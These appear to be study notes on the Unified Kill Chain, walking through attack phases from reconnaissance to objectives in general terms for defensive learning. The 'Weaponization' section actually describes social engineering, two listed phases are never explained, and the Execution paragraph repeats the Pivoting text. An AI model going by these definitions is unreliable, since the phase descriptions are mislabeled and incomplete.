Unified Kill Chain

The Unified Kill Chain was published in 2017 and updated in 2022. UKC aims to complement (not compete) other cybersecurity kill chain frameworks such as Lockheed Martin’s and MITRE’s ATT&CK.

There are 18 phases to an attack in the UKC framework:

1. Reconnaissance

2. Weaponization

3. Delivery

4. Social Engineering

5. Exploitation

6. Persistence

7. Defense Evasion

8. Command & Control

9. Pivoting

10. Discovery

11. Privilege Escalation

12. Execution

13. Credential Access

14. Lateral Movement

15. Collection

16. Exfiltration

17. Impact

18. Objectives

---

Phase: In (Initial Foothold)

The main focus of this series of phases is for an attacker to gain access to a system or networked environment. An attacker will use numerous tactics to investigate the system for potential vulnerabilities that can be exploited to gain a foothold in the system. This series of phases also accommodates for an attacker creating a form of persistence. Finally, the UKC accounts for the fact that attackers will often use a combination of tactics.

Reconnaissance

This phase describes techniques that an adversary employs to gather information relating to their target via passive or active reconnaissance. Information gathered from this phase can include:

• Discovering what systems and services are running on the target, this is beneficial information in the weaponization and exploitation phases.

• Finding contact lists or lists of employees that can be impersonated or used in either a social engineering or phishing attack.

• Looking for potential credentials that may be of use in later stages,  such as pivoting or initial access.

• Understanding the network topology and other networked systems can be used to pivot too. 

Weaponization

This phase describes techniques that an adversary can employ to manipulate employees to perform actions that will aid in the adversaries attack. Examples below:

• Getting a user to open a malicious attachment.

• Impersonating a web page and having the user enter their credentials.

• Calling or visiting the target and impersonating a user (for example, requesting a password reset) or being able to gain access to areas of a site that the attacker would not previously be capable of (for example, impersonating a utility engineer).

Exploitation

This phase describes how an attacker takes advantage of weaknesses or vulnerabilities present in a system. The UKC defines "Exploitation" as abuse of vulnerabilities to perform code execution. Examples below:

• Uploading and executing a reverse shell to a web application.

• Interfering with an automated script on the system to execute code.

• Abusing a web application vulnerability to execute code on the system it is running on.

Persistence

This phase describes the techniques an adversary uses to maintain access to a system they have gained an initial foothold on. Examples below:

• Creating a service on the target system that will allow the attacker to regain access.

• Adding the target system to a Command & Control server where commands can be executed remotely at any time.

• Leaving other forms of backdoors that execute when a certain action occurs on the system (i.e. a reverse shell will execute when a system administrator logs in).

Defence Evasion

This phase specifically is used to understand the techniques an adversary uses to evade defensive measures put in place in the system or network. The Defence Evasion phase is one of the more valuable phases in the UKC. This phase is valuable when analysing an attack as it helps form a response and better yet - gives the defensive team information on how they can improve their defense systems in the future. Examples below:

• Web application firewalls.

• Network firewalls.

• Anti-virus systems on the target machine.

• Intrusion detection systems.

Command & Control

This phase combines the efforts an adversary made during the “Weaponization” stage of the UKC to establish communications between the adversary and target system. An adversary can establish command and control of a target system to achieve its action on objectives. For example, the adversary can:

• Execute commands.

• Steal data, credentials and other information.

• Use the controlled server to pivot to other systems on the network.

Pivoting

Pivoting is the technique an adversary uses to reach other systems within a network that are not otherwise accessible. There are often many systems in a network that are not directly reachable and often contain valuable data or have weaker security. For example, an adversary can gain access to a web server that is publically accessible to attack other systems that are within the same network (but are not accessible via the internet).

---

Phase: Through (Network Propagation)

This phase follows a successful foothold being established on the target network. An attacker would seek to gain additional access and privileges to systems and data to fulfill their goals. The attacker would set up a base on one of the systems to act as their pivot point and use it to gather information about the internal network.

Pivoting

Once the attacker has access to the system, they would use it as their staging site and a tunnel between their command operations and the victim’s network. The system would also be used as the distribution point for all malware and backdoors at later stages.

Discovery

The adversary would uncover information about the system and the network it is connected to. Within this stage, the knowledge base would be built from the active user accounts, the permissions granted, applications and software in use, web browser activity, files, directories and network shares, and system configurations.

Privilege Escalation

After gathering knowledge, the adversary would look to gain more prominent permissions within the pivot system. They would leverage the information on the accounts present with vulnerabilities and misconfigurations found to elevate their access to one of the following superior levels:

• SYSTEM/ ROOT.

• Local Administrator.

• A user account with Admin-like access.

• A user account with specific access or functions.

Execution

Once the attacker has access to the system, they would use it as their staging site and a tunnel between their command operations and the victim’s network. This is where they deploy their malicious code using the pivot system as their host. Remote trojans, C2 scripts, malicious links, and scheduled tasks are deployed and created to facilitate a recurring presence on the system and uphold their persistence.

Credential Access

Working hand in hand with the Privilege Escalation stage, the adversary would attempt to steal account names and passwords through various methods, including keylogging and credential dumping. This makes them harder to detect during their attack as they would be using legitimate credentials.

Lateral Movement

With the credentials and elevated privileges, the adversary would attempt to move through the network and jump onto other targeted systems to achieve their primary objective. The stealthier the technique used, the better.

---

Phase: Out (Action on Objectives)

This phase wraps up the journey of an adversary’s attack on an environment, where they have critical asset access and can fulfil their attack goals. These goals are usually geared toward compromising the confidentiality, integrity and availability (CIA) triad.

Collection

In this phase, the adversary will seek to gather all the valuable data of interest. This will compromise the confidentiality of the data and would lead to the next attack stage — Exfiltration. The main target sources include drives, browsers, audio, video, and email.

Exfiltration

To elevate their compromise, the adversary would seek to steal data, which would be packaged using encryption measures and compression to avoid any detection. The C2 channel and tunnel deployed in the earlier phases will come in handy during this process.

Impact

If the adversary seeks to compromise the integrity and availability of the data assets, they would manipulate, interrupt or destroy these assets. The goal would be to disrupt business and operational processes and may involve removing account access, disk wipes, and data encryption such as ransomware, defacement and denial of service (DoS) attacks.

Objectives

With all the power and access to the systems and network, the adversary would seek to achieve their strategic goal for the attack.

For example, if the attack was financially motivated, they may seek to encrypt files and systems with ransomware and ask for payment to release the data. In other instances, the attacker may seek to damage the reputation of the business, and they would release private and confidential information to the public.

---

1

¹ Unified Kill Chain (UKC) TryHackMe Room